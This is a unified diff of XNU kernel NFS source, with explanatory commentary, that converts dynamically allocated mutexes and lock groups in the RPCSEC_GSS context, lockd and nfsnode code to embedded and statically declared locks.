@@ -2364,12 +2357,12 @@ nfs_gss_clnt_ctx_neg_cache_reap(struct nfsmount *nmp)
                        continue;
                }
                /* Not referenced, remove it. */
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (cp->gss_clnt_refcnt == 0) {
                        cp->gss_clnt_flags |= GSS_CTX_DESTROY;
                        destroy = 1;
                }
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
                if (destroy) {
                        TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries);
                        nmp->nm_ncentries++;
@@ -2460,7 +2453,7 @@ nfs_gss_clnt_ctx_copy(struct nfs_gss_clnt_ctx *scp, struct nfs_gss_clnt_ctx **dc
                return ENOMEM;
        }
        bzero(dcp, sizeof(struct nfs_gss_clnt_ctx));
-       dcp->gss_clnt_mtx = lck_mtx_alloc_init(nfs_gss_clnt_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&dcp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL);
        dcp->gss_clnt_cred = scp->gss_clnt_cred;
        kauth_cred_ref(dcp->gss_clnt_cred);
        dcp->gss_clnt_prinlen = scp->gss_clnt_prinlen;
@@ -2500,10 +2493,8 @@ nfs_gss_clnt_ctx_destroy(struct nfs_gss_clnt_ctx *cp)
        host_release_special_port(cp->gss_clnt_mport);
        cp->gss_clnt_mport = IPC_PORT_NULL;
 
-       if (cp->gss_clnt_mtx) {
-               lck_mtx_destroy(cp->gss_clnt_mtx, nfs_gss_clnt_grp);
-               cp->gss_clnt_mtx = (lck_mtx_t *)NULL;
-       }
+       lck_mtx_destroy(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp);
+
        if (IS_VALID_CRED(cp->gss_clnt_cred)) {
                kauth_cred_unref(&cp->gss_clnt_cred);
        }
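In the client-context hunks, gss_clnt_mtx changes from a separately allocated lck_mtx_t * to a mutex embedded in struct nfs_gss_clnt_ctx: creation and copy paths call lck_mtx_init(&cp->gss_clnt_mtx, ...), every lock/unlock site takes the address, and teardown calls lck_mtx_destroy() unconditionally, so the old NULL-pointer guard disappears. A condensed lifecycle sketch using the calls visible in the hunks (struct layout abbreviated and assumed):

    struct nfs_gss_clnt_ctx {               /* abbreviated */
            lck_mtx_t gss_clnt_mtx;         /* embedded, was lck_mtx_t * */
            int       gss_clnt_refcnt;
            uint32_t  gss_clnt_flags;
            /* ... */
    };

    /* create / copy (nfs_gss_clnt_ctx_find_principal, nfs_gss_clnt_ctx_copy) */
    lck_mtx_init(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL);

    /* use */
    lck_mtx_lock(&cp->gss_clnt_mtx);
    cp->gss_clnt_refcnt++;
    lck_mtx_unlock(&cp->gss_clnt_mtx);

    /* teardown (nfs_gss_clnt_ctx_destroy), no NULL check needed */
    lck_mtx_destroy(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp);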
@@ -2550,9 +2541,9 @@ nfs_gss_clnt_ctx_renew(struct nfsreq *req)
        }
        nmp = req->r_nmp;
 
-       lck_mtx_lock(cp->gss_clnt_mtx);
+       lck_mtx_lock(&cp->gss_clnt_mtx);
        if (cp->gss_clnt_flags & GSS_CTX_INVAL) {
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
                nfs_gss_clnt_ctx_unref(req);
                return 0;     // already being renewed
        }
@@ -2563,7 +2554,7 @@ nfs_gss_clnt_ctx_renew(struct nfsreq *req)
                cp->gss_clnt_flags &= ~GSS_NEEDSEQ;
                wakeup(cp);
        }
-       lck_mtx_unlock(cp->gss_clnt_mtx);
+       lck_mtx_unlock(&cp->gss_clnt_mtx);
 
        if (cp->gss_clnt_proc == RPCSEC_GSS_DESTROY) {
                return EACCES;  /* Destroying a context is best effort. Don't renew. */
@@ -2623,13 +2614,13 @@ nfs_gss_clnt_ctx_unmount(struct nfsmount *nmp)
        while ((cp = TAILQ_FIRST(&nmp->nm_gsscl))) {
                TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries);
                cp->gss_clnt_entries.tqe_next = NFSNOLIST;
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (cp->gss_clnt_flags & GSS_CTX_DESTROY) {
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        continue;
                }
                cp->gss_clnt_refcnt++;
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
                req->r_gss_ctx = cp;
 
                lck_mtx_unlock(&nmp->nm_lock);
@@ -2659,9 +2650,9 @@ nfs_gss_clnt_ctx_unmount(struct nfsmount *nmp)
                 * the reference to remove it if its
                 * refcount is zero.
                 */
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY);
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
                nfs_gss_clnt_ctx_unref(req);
                lck_mtx_lock(&nmp->nm_lock);
        }
@@ -2687,19 +2678,19 @@ nfs_gss_clnt_ctx_remove(struct nfsmount *nmp, kauth_cred_t cred)
        NFS_GSS_CLNT_CTX_DUMP(nmp);
        lck_mtx_lock(&nmp->nm_lock);
        TAILQ_FOREACH_SAFE(cp, &nmp->nm_gsscl, gss_clnt_entries, tcp) {
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, cred)) {
                        if (cp->gss_clnt_flags & GSS_CTX_DESTROY) {
                                NFS_GSS_DBG("Found destroyed context %d/%d. refcnt = %d continuing\n",
                                    kauth_cred_getasid(cp->gss_clnt_cred),
                                    kauth_cred_getauid(cp->gss_clnt_cred),
                                    cp->gss_clnt_refcnt);
-                               lck_mtx_unlock(cp->gss_clnt_mtx);
+                               lck_mtx_unlock(&cp->gss_clnt_mtx);
                                continue;
                        }
                        cp->gss_clnt_refcnt++;
                        cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY);
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        req->r_gss_ctx = cp;
                        lck_mtx_unlock(&nmp->nm_lock);
                        /*
@@ -2714,7 +2705,7 @@ nfs_gss_clnt_ctx_remove(struct nfsmount *nmp, kauth_cred_t cred)
                        NFS_ZFREE(nfs_req_zone, req);
                        return 0;
                }
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
        }
 
        lck_mtx_unlock(&nmp->nm_lock);
@@ -2783,20 +2774,20 @@ nfs_gss_clnt_ctx_get_principal(struct nfsmount *nmp, vfs_context_t ctx,
        req->r_nmp = nmp;
        lck_mtx_lock(&nmp->nm_lock);
        TAILQ_FOREACH(cp, &nmp->nm_gsscl, gss_clnt_entries) {
-               lck_mtx_lock(cp->gss_clnt_mtx);
+               lck_mtx_lock(&cp->gss_clnt_mtx);
                if (cp->gss_clnt_flags & GSS_CTX_DESTROY) {
                        NFS_GSS_DBG("Found destroyed context %s refcnt = %d continuing\n",
                            NFS_GSS_CTX(req, cp),
                            cp->gss_clnt_refcnt);
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        continue;
                }
                if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, cred)) {
                        cp->gss_clnt_refcnt++;
-                       lck_mtx_unlock(cp->gss_clnt_mtx);
+                       lck_mtx_unlock(&cp->gss_clnt_mtx);
                        goto out;
                }
-               lck_mtx_unlock(cp->gss_clnt_mtx);
+               lck_mtx_unlock(&cp->gss_clnt_mtx);
        }
 
 out:
@@ -2876,7 +2867,7 @@ nfs_gss_svc_ctx_find(uint32_t handle)
         */
        clock_interval_to_deadline(GSS_CTX_PEND, NSEC_PER_SEC, &timenow);
 
-       lck_mtx_lock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_lock(&nfs_gss_svc_ctx_mutex);
 
        LIST_FOREACH(cp, head, gss_svc_entries) {
                if (cp->gss_svc_handle == handle) {
@@ -2896,14 +2887,14 @@ nfs_gss_svc_ctx_find(uint32_t handle)
                                cp = NULL;
                                break;
                        }
-                       lck_mtx_lock(cp->gss_svc_mtx);
+                       lck_mtx_lock(&cp->gss_svc_mtx);
                        cp->gss_svc_refcnt++;
-                       lck_mtx_unlock(cp->gss_svc_mtx);
+                       lck_mtx_unlock(&cp->gss_svc_mtx);
                        break;
                }
        }
 
-       lck_mtx_unlock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_unlock(&nfs_gss_svc_ctx_mutex);
 
        return cp;
 }
@@ -2918,7 +2909,7 @@ nfs_gss_svc_ctx_insert(struct nfs_gss_svc_ctx *cp)
        struct nfs_gss_svc_ctx_hashhead *head;
        struct nfs_gss_svc_ctx *p;
 
-       lck_mtx_lock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_lock(&nfs_gss_svc_ctx_mutex);
 
        /*
         * Give the client a random handle so that if we reboot
@@ -2948,7 +2939,7 @@ retry:
                    min(GSS_TIMER_PERIOD, max(GSS_CTX_TTL_MIN, nfsrv_gss_context_ttl)) * MSECS_PER_SEC);
        }
 
-       lck_mtx_unlock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_unlock(&nfs_gss_svc_ctx_mutex);
 }
 
 /*
@@ -2964,7 +2955,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2)
        int contexts = 0;
        int i;
 
-       lck_mtx_lock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_lock(&nfs_gss_svc_ctx_mutex);
        clock_get_uptime(&timenow);
 
        NFS_GSS_DBG("is running\n");
@@ -2990,7 +2981,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2)
                                if (cp->gss_svc_seqbits) {
                                        FREE(cp->gss_svc_seqbits, M_TEMP);
                                }
-                               lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp);
+                               lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp);
                                FREE(cp, M_TEMP);
                                contexts--;
                        }
@@ -3009,7 +3000,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2)
                    min(GSS_TIMER_PERIOD, max(GSS_CTX_TTL_MIN, nfsrv_gss_context_ttl)) * MSECS_PER_SEC);
        }
 
-       lck_mtx_unlock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_unlock(&nfs_gss_svc_ctx_mutex);
 }
 
 /*
@@ -3094,7 +3085,7 @@ nfs_gss_svc_cred_get(struct nfsrv_descript *nd, struct nfsm_chain *nmc)
                        error = ENOMEM;
                        goto nfsmout;
                }
-               cp->gss_svc_mtx = lck_mtx_alloc_init(nfs_gss_svc_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&cp->gss_svc_mtx, &nfs_gss_svc_grp, LCK_ATTR_NULL);
                cp->gss_svc_refcnt = 1;
        } else {
                /*
@@ -3328,7 +3319,7 @@ nfs_gss_svc_cred_get(struct nfsrv_descript *nd, struct nfsm_chain *nmc)
                }
                if (error) {
                        if (proc == RPCSEC_GSS_INIT) {
-                               lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp);
+                               lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp);
                                FREE(cp, M_TEMP);
                                cp = NULL;
                        }
@@ -3571,10 +3562,10 @@ nfs_gss_svc_ctx_init(struct nfsrv_descript *nd, struct nfsrv_sock *slp, mbuf_t *
                cp = nfs_gss_svc_ctx_find(cp->gss_svc_handle);
                if (cp != NULL) {
                        cp->gss_svc_handle = 0; // so it can't be found
-                       lck_mtx_lock(cp->gss_svc_mtx);
+                       lck_mtx_lock(&cp->gss_svc_mtx);
                        clock_interval_to_deadline(GSS_CTX_PEND, NSEC_PER_SEC,
                            &cp->gss_svc_incarnation);
-                       lck_mtx_unlock(cp->gss_svc_mtx);
+                       lck_mtx_unlock(&cp->gss_svc_mtx);
                }
                break;
        default:
@@ -3621,7 +3612,7 @@ nfsmout:
                if (cp->gss_svc_token != NULL) {
                        FREE(cp->gss_svc_token, M_TEMP);
                }
-               lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp);
+               lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp);
                FREE(cp, M_TEMP);
        }
 
@@ -3778,7 +3769,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
        uint32_t win = cp->gss_svc_seqwin;
        uint32_t i;
 
-       lck_mtx_lock(cp->gss_svc_mtx);
+       lck_mtx_lock(&cp->gss_svc_mtx);
 
        /*
         * If greater than the window upper bound,
@@ -3794,7 +3785,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
                }
                win_setbit(bits, seq % win);
                cp->gss_svc_seqmax = seq;
-               lck_mtx_unlock(cp->gss_svc_mtx);
+               lck_mtx_unlock(&cp->gss_svc_mtx);
                return 1;
        }
 
@@ -3802,7 +3793,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
         * Invalid if below the lower bound of the window
         */
        if (seq <= cp->gss_svc_seqmax - win) {
-               lck_mtx_unlock(cp->gss_svc_mtx);
+               lck_mtx_unlock(&cp->gss_svc_mtx);
                return 0;
        }
 
@@ -3810,11 +3801,11 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
         * In the window, invalid if the bit is already set
         */
        if (win_getbit(bits, seq % win)) {
-               lck_mtx_unlock(cp->gss_svc_mtx);
+               lck_mtx_unlock(&cp->gss_svc_mtx);
                return 0;
        }
        win_setbit(bits, seq % win);
-       lck_mtx_unlock(cp->gss_svc_mtx);
+       lck_mtx_unlock(&cp->gss_svc_mtx);
        return 1;
 }
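
The hunks in nfs_gss_svc_seqnum_valid() change only the mutex argument to &cp->gss_svc_mtx; the check they serialize is the usual RPCSEC_GSS sliding-bitmap replay window that the in-line comments describe. A rough standalone sketch of that window follows; the 128-bit size, the names, and the omission of the per-context lock are illustrative, not the xnu implementation.

#include <sys/types.h>

#define WIN_BITS        128
#define WORD_BITS       32

struct replay_win {
        uint32_t        rw_seqmax;                      /* highest sequence number accepted so far */
        uint32_t        rw_bits[WIN_BITS / WORD_BITS];  /* one bit per slot in the window */
};

#define rw_getbit(w, i) ((w)->rw_bits[(i) / WORD_BITS] &   (1U << ((i) % WORD_BITS)))
#define rw_setbit(w, i) ((w)->rw_bits[(i) / WORD_BITS] |=  (1U << ((i) % WORD_BITS)))
#define rw_clrbit(w, i) ((w)->rw_bits[(i) / WORD_BITS] &= ~(1U << ((i) % WORD_BITS)))

/* Returns 1 if seq is acceptable, 0 if it is too old or has been seen before. */
static int
replay_win_check(struct replay_win *w, uint32_t seq)
{
        uint32_t i;

        if (seq > w->rw_seqmax) {
                /* above the upper bound: slide the window up, clearing the skipped slots */
                for (i = w->rw_seqmax + 1; i < seq; i++) {
                        rw_clrbit(w, i % WIN_BITS);
                }
                rw_setbit(w, seq % WIN_BITS);
                w->rw_seqmax = seq;
                return 1;
        }
        if (w->rw_seqmax >= WIN_BITS && seq <= w->rw_seqmax - WIN_BITS) {
                return 0;       /* below the lower bound of the window */
        }
        if (rw_getbit(w, seq % WIN_BITS)) {
                return 0;       /* bit already set: replayed request */
        }
        rw_setbit(w, seq % WIN_BITS);
        return 1;
}
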
 
@@ -3828,13 +3819,13 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq)
 void
 nfs_gss_svc_ctx_deref(struct nfs_gss_svc_ctx *cp)
 {
-       lck_mtx_lock(cp->gss_svc_mtx);
+       lck_mtx_lock(&cp->gss_svc_mtx);
        if (cp->gss_svc_refcnt > 0) {
                cp->gss_svc_refcnt--;
        } else {
                printf("nfs_gss_ctx_deref: zero refcount\n");
        }
-       lck_mtx_unlock(cp->gss_svc_mtx);
+       lck_mtx_unlock(&cp->gss_svc_mtx);
 }
 
 /*
@@ -3847,7 +3838,7 @@ nfs_gss_svc_cleanup(void)
        struct nfs_gss_svc_ctx *cp, *ncp;
        int i;
 
-       lck_mtx_lock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_lock(&nfs_gss_svc_ctx_mutex);
 
        /*
         * Run through all the buckets
@@ -3862,12 +3853,12 @@ nfs_gss_svc_cleanup(void)
                        if (cp->gss_svc_seqbits) {
                                FREE(cp->gss_svc_seqbits, M_TEMP);
                        }
-                       lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp);
+                       lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp);
                        FREE(cp, M_TEMP);
                }
        }
 
-       lck_mtx_unlock(nfs_gss_svc_ctx_mutex);
+       lck_mtx_unlock(&nfs_gss_svc_ctx_mutex);
 }
 
 #endif /* CONFIG_NFS_SERVER */
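
Every RPCSEC_GSS hunk above follows one conversion: the per-context mutex is no longer a separately allocated lck_mtx_t * but a lck_mtx_t embedded in the context structure, so each lock, unlock and destroy call takes the address of the field, and lck_mtx_alloc_init() becomes lck_mtx_init() on storage owned by the context itself. A minimal sketch of that lifecycle, using placeholder names (my_grp, my_ctx) rather than the xnu symbols:

#include <sys/types.h>
#include <kern/locks.h>

static LCK_GRP_DECLARE(my_grp, "my-ctx");       /* lock group registered at compile time */

struct my_ctx {
        lck_mtx_t       ctx_mtx;        /* embedded mutex, not a pointer */
        uint32_t        ctx_refcnt;
};

static void
my_ctx_setup(struct my_ctx *cp)
{
        /* initializes the embedded mutex in place; nothing extra is allocated */
        lck_mtx_init(&cp->ctx_mtx, &my_grp, LCK_ATTR_NULL);
        cp->ctx_refcnt = 1;
}

static void
my_ctx_ref(struct my_ctx *cp)
{
        lck_mtx_lock(&cp->ctx_mtx);
        cp->ctx_refcnt++;
        lck_mtx_unlock(&cp->ctx_mtx);
}

static void
my_ctx_teardown(struct my_ctx *cp)
{
        /* tears down the lock state; the memory goes away with the structure */
        lck_mtx_destroy(&cp->ctx_mtx, &my_grp);
}

The practical effect is that context setup no longer has a mutex-allocation failure path and each lock operation saves a pointer dereference, at the cost of a slightly larger context structure.
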
index 01aaabee7fa435db94778d156106ae6b5e8dd550..05680ef89b79a909e90a8984b9437b6ecfe2f05c 100644 (file)
@@ -85,7 +85,7 @@ extern u_char krb5_mech_oid[11];
  * The client's RPCSEC_GSS context information
  */
 struct nfs_gss_clnt_ctx {
-       lck_mtx_t               *gss_clnt_mtx;
+       lck_mtx_t               gss_clnt_mtx;
        thread_t                gss_clnt_thread;        // Thread creating context
        TAILQ_ENTRY(nfs_gss_clnt_ctx)   gss_clnt_entries;
        uint32_t                gss_clnt_flags;         // Flag bits - see below
@@ -135,7 +135,7 @@ struct nfs_gss_clnt_ctx {
  * The server's RPCSEC_GSS context information
  */
 struct nfs_gss_svc_ctx {
-       lck_mtx_t               *gss_svc_mtx;
+       lck_mtx_t               gss_svc_mtx;
        LIST_ENTRY(nfs_gss_svc_ctx)     gss_svc_entries;
        uint32_t                gss_svc_handle;         // Identifies server context to client
        uint32_t                gss_svc_refcnt;         // Reference count
index 4b0d196312b6165e1284806c450a95f02b5f7b8a..5872d18409185a73519666b0daee26fa47e97d29 100644 (file)
@@ -103,13 +103,14 @@ extern void ipc_port_release_send(ipc_port_t);
  * kept sorted by transaction ID (xid).
  */
 static uint64_t nfs_lockxid = 0;
-static LOCKD_MSG_QUEUE nfs_pendlockq;
+static LOCKD_MSG_QUEUE nfs_pendlockq = TAILQ_HEAD_INITIALIZER(nfs_pendlockq);
 
 /* list of mounts that are (potentially) making lockd requests */
-TAILQ_HEAD(nfs_lockd_mount_list, nfsmount) nfs_lockd_mount_list;
+TAILQ_HEAD(nfs_lockd_mount_list, nfsmount) nfs_lockd_mount_list =
+    TAILQ_HEAD_INITIALIZER(nfs_lockd_mount_list);
 
-static lck_grp_t *nfs_lock_lck_grp;
-static lck_mtx_t *nfs_lock_mutex;
+static LCK_GRP_DECLARE(nfs_lock_lck_grp, "nfs_lock");
+static LCK_MTX_DECLARE(nfs_lock_mutex, &nfs_lock_lck_grp);
 
 void nfs_lockdmsg_enqueue(LOCKD_MSG_REQUEST *);
 void nfs_lockdmsg_dequeue(LOCKD_MSG_REQUEST *);
@@ -119,29 +120,16 @@ LOCKD_MSG_REQUEST *nfs_lockdmsg_find_by_xid(uint64_t);
 uint64_t nfs_lockxid_get(void);
 int nfs_lockd_send_request(LOCKD_MSG *, int);
 
-/*
- * initialize global nfs lock state
- */
-void
-nfs_lockinit(void)
-{
-       TAILQ_INIT(&nfs_pendlockq);
-       TAILQ_INIT(&nfs_lockd_mount_list);
-
-       nfs_lock_lck_grp = lck_grp_alloc_init("nfs_lock", LCK_GRP_ATTR_NULL);
-       nfs_lock_mutex = lck_mtx_alloc_init(nfs_lock_lck_grp, LCK_ATTR_NULL);
-}
-
 /*
  * Register a mount as (potentially) making lockd requests.
  */
 void
 nfs_lockd_mount_register(struct nfsmount *nmp)
 {
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
        TAILQ_INSERT_HEAD(&nfs_lockd_mount_list, nmp, nm_ldlink);
        nfs_lockd_mounts++;
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
 }
 
 /*
@@ -157,9 +145,9 @@ nfs_lockd_mount_unregister(struct nfsmount *nmp)
        mach_port_t lockd_port = IPC_PORT_NULL;
        kern_return_t kr;
 
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
        if (nmp->nm_ldlink.tqe_next == NFSNOLIST) {
-               lck_mtx_unlock(nfs_lock_mutex);
+               lck_mtx_unlock(&nfs_lock_mutex);
                return;
        }
 
@@ -174,7 +162,7 @@ nfs_lockd_mount_unregister(struct nfsmount *nmp)
                nfs_lockd_request_sent = 0;
        }
 
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
 
        if (!send_shutdown) {
                return;
@@ -463,7 +451,7 @@ nfs3_lockd_request(
        interruptable = NMFLAG(nmp, INTR);
        lck_mtx_unlock(&nmp->nm_lock);
 
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
 
        /* allocate unique xid */
        msg->lm_xid = nfs_lockxid_get();
@@ -475,9 +463,9 @@ nfs3_lockd_request(
                nfs_lockd_request_sent = 1;
 
                /* need to drop nfs_lock_mutex while calling nfs_lockd_send_request() */
-               lck_mtx_unlock(nfs_lock_mutex);
+               lck_mtx_unlock(&nfs_lock_mutex);
                error = nfs_lockd_send_request(msg, interruptable);
-               lck_mtx_lock(nfs_lock_mutex);
+               lck_mtx_lock(&nfs_lock_mutex);
                if (error && error != EAGAIN) {
                        break;
                }
@@ -507,7 +495,7 @@ wait_for_granted:
                while (now.tv_sec < endtime) {
                        error = error2 = 0;
                        if (!msgreq->lmr_answered) {
-                               error = msleep(msgreq, nfs_lock_mutex, slpflag | PUSER, "lockd", &ts);
+                               error = msleep(msgreq, &nfs_lock_mutex, slpflag | PUSER, "lockd", &ts);
                                slpflag = 0;
                        }
                        if (msgreq->lmr_answered) {
@@ -736,7 +724,7 @@ wait_for_granted:
                         * for this mount.
                         */
                        nfs_lockdmsg_dequeue(msgreq);
-                       lck_mtx_unlock(nfs_lock_mutex);
+                       lck_mtx_unlock(&nfs_lock_mutex);
                        lck_mtx_lock(&nmp->nm_lock);
                        if (nmp->nm_lockmode == NFS_LOCK_MODE_ENABLED) {
                                nmp->nm_lockmode = NFS_LOCK_MODE_DISABLED;
@@ -763,7 +751,7 @@ wait_for_granted:
 
        nfs_lockdmsg_dequeue(msgreq);
 
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
 
        return error;
 }
@@ -941,7 +929,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp)
                return EINVAL;
        }
 
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
 
        /* try to find the lockd message by transaction id (cookie) */
        msgreq = nfs_lockdmsg_find_by_xid(ansp->la_xid);
@@ -964,7 +952,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp)
                }
        }
        if (!msgreq) {
-               lck_mtx_unlock(nfs_lock_mutex);
+               lck_mtx_unlock(&nfs_lock_mutex);
                return EPIPE;
        }
 
@@ -988,7 +976,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp)
        }
 
        msgreq->lmr_answered = 1;
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
        wakeup(msgreq);
 
        return 0;
@@ -1029,7 +1017,7 @@ nfslockdnotify(proc_t p, user_addr_t argp)
        argp += headsize;
        saddr = (struct sockaddr *)&ln.ln_addr[0];
 
-       lck_mtx_lock(nfs_lock_mutex);
+       lck_mtx_lock(&nfs_lock_mutex);
 
        for (i = 0; i < ln.ln_addrcount; i++) {
                error = copyin(argp, &ln.ln_addr[0], sizeof(ln.ln_addr[0]));
@@ -1050,7 +1038,7 @@ nfslockdnotify(proc_t p, user_addr_t argp)
                }
        }
 
-       lck_mtx_unlock(nfs_lock_mutex);
+       lck_mtx_unlock(&nfs_lock_mutex);
 
        return error;
 }
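
The lockd changes pair the pointer-to-embedded conversion with compile-time initialization: TAILQ_HEAD_INITIALIZER sets up the pending-message queue and the mount list, LCK_GRP_DECLARE/LCK_MTX_DECLARE set up the lock group and mutex, and the boot-time nfs_lockinit() hook is deleted because there is nothing left for it to do. A small self-contained sketch of the same pattern, with placeholder queue and field names:

#include <sys/types.h>
#include <sys/queue.h>
#include <kern/locks.h>

struct msg {
        TAILQ_ENTRY(msg)        m_link;
        uint64_t                m_xid;
};
TAILQ_HEAD(msg_queue, msg);

/* everything below is initialized by the compiler; no init routine runs at boot */
static struct msg_queue pending = TAILQ_HEAD_INITIALIZER(pending);
static LCK_GRP_DECLARE(pending_grp, "pending");
static LCK_MTX_DECLARE(pending_mtx, &pending_grp);

static void
msg_enqueue(struct msg *m)
{
        lck_mtx_lock(&pending_mtx);
        TAILQ_INSERT_TAIL(&pending, m, m_link);
        lck_mtx_unlock(&pending_mtx);
}

static struct msg *
msg_find(uint64_t xid)
{
        struct msg *m;

        lck_mtx_lock(&pending_mtx);
        TAILQ_FOREACH(m, &pending, m_link) {
                if (m->m_xid == xid) {
                        break;
                }
        }
        lck_mtx_unlock(&pending_mtx);
        return m;       /* NULL if the loop ran to completion */
}

Sleep sites change in the same way: the msleep() call in nfs3_lockd_request() now passes &nfs_lock_mutex instead of a pointer variable that had to be allocated first.
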
index b360849e699445b6cd92a90b452bb45d4b609f99..7e4b0759010c56aacfff1ffbed57fea6c821c803 100644 (file)
@@ -144,7 +144,6 @@ struct lockd_notify {
 
 
 #ifdef KERNEL
-void    nfs_lockinit(void);
 void    nfs_lockd_mount_register(struct nfsmount *);
 void    nfs_lockd_mount_unregister(struct nfsmount *);
 int     nfs3_lockd_request(nfsnode_t, int, LOCKD_MSG_REQUEST *, int, thread_t);
index c47fa9263ed17c9f214118347057aa56b2f074b3..84745f933dab1fb14dd7452676a475a2ed929059 100644 (file)
 static LIST_HEAD(nfsnodehashhead, nfsnode) * nfsnodehashtbl;
 static u_long nfsnodehash;
 
-static lck_grp_t *nfs_node_hash_lck_grp;
-static lck_grp_t *nfs_node_lck_grp;
-static lck_grp_t *nfs_data_lck_grp;
-lck_mtx_t *nfs_node_hash_mutex;
+static LCK_GRP_DECLARE(nfs_node_hash_lck_grp, "nfs_node_hash");
+static LCK_GRP_DECLARE(nfs_node_lck_grp, "nfs_node");
+static LCK_GRP_DECLARE(nfs_data_lck_grp, "nfs_data");
+LCK_MTX_DECLARE(nfs_node_hash_mutex, &nfs_node_hash_lck_grp);
 
 ZONE_DECLARE(nfsnode_zone, "NFS node",
     sizeof(struct nfsnode), ZC_ZFREE_CLEARMEM);
 
 #define NFS_NODE_DBG(...) NFS_DBG(NFS_FAC_NODE, 7, ## __VA_ARGS__)
 
-/*
- * Initialize hash links for nfsnodes
- * and build nfsnode free list.
- */
-void
-nfs_nhinit(void)
-{
-       nfs_node_hash_lck_grp = lck_grp_alloc_init("nfs_node_hash", LCK_GRP_ATTR_NULL);
-       nfs_node_hash_mutex = lck_mtx_alloc_init(nfs_node_hash_lck_grp, LCK_ATTR_NULL);
-       nfs_node_lck_grp = lck_grp_alloc_init("nfs_node", LCK_GRP_ATTR_NULL);
-       nfs_data_lck_grp = lck_grp_alloc_init("nfs_data", LCK_GRP_ATTR_NULL);
-}
-
 void
 nfs_nhinit_finish(void)
 {
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        if (!nfsnodehashtbl) {
                nfsnodehashtbl = hashinit(desiredvnodes, M_NFSNODE, &nfsnodehash);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 }
 
 /*
@@ -226,7 +213,7 @@ nfs_nget(
        cn_namelen = cnp ? cnp->cn_namelen : 0;
        nfshash = nfs_hash(fhp, fhsize);
 loop:
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
